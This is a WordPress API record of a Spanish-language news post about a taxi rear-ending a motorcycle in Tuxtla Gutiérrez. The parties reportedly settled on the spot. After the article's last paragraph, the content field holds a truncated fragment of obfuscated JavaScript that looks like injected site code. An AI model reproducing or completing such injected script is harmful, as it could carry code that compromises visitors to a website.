{"id":5592,"date":"2022-10-04T02:25:39","date_gmt":"2022-10-04T02:25:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5592"},"modified":"2022-10-04T02:25:40","modified_gmt":"2022-10-04T02:25:40","slug":"taxista-y-motociclista-colisionan-en-el-libramiento-norte-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5592","title":{"rendered":"Taxista y motociclista colisionan en el Libramiento Norte de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"406\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1664850268961.jpg\" alt=\"\" class=\"wp-image-5593\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1664850268961.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/FB_IMG_1664850268961-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 3 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Un taxi y una motocicleta colisionaron en el Libramiento Norte este lunes por la tarde.<\/p>\n\n\n\n<p>Los reportes de tr\u00e1nsito informaron que, la moto Italika de color negro corr\u00eda en el sentido de Oriente a Poniente en el carril de baja a la altura de la calle Central, cuando fue impactado en la parte trasera por un taxi con n\u00famero econ\u00f3mico 31 28.<\/p>\n\n\n\n<p>En su defensa el taxista dijo que el motociclista par\u00f3 de manera repentina y no pudo frenar.<\/p>\n\n\n\n<p>El motociclista dijo que se vio en la necesidad de frenar para dar el paso a una patrulla.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito municipal para mediar en la situaci\u00f3n.<\/p>\n\n\n\n<p>Afortunadamente, los involucrados llegaron a un acuerdo econ\u00f3mico y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 3 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Un taxi y una motocicleta colisionaron en el Libramiento Norte este lunes por la tarde. Los reportes de tr\u00e1nsito informaron que, la moto Italika de color negro corr\u00eda en el sentido de Oriente a Poniente en el carril de baja a la altura de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5593,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5592","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5592","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5592"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5592\/revisions"}],"predecessor-version":[{"id":5594,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5592\/revisions\/5594"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5593"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5592"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5592"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5592"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}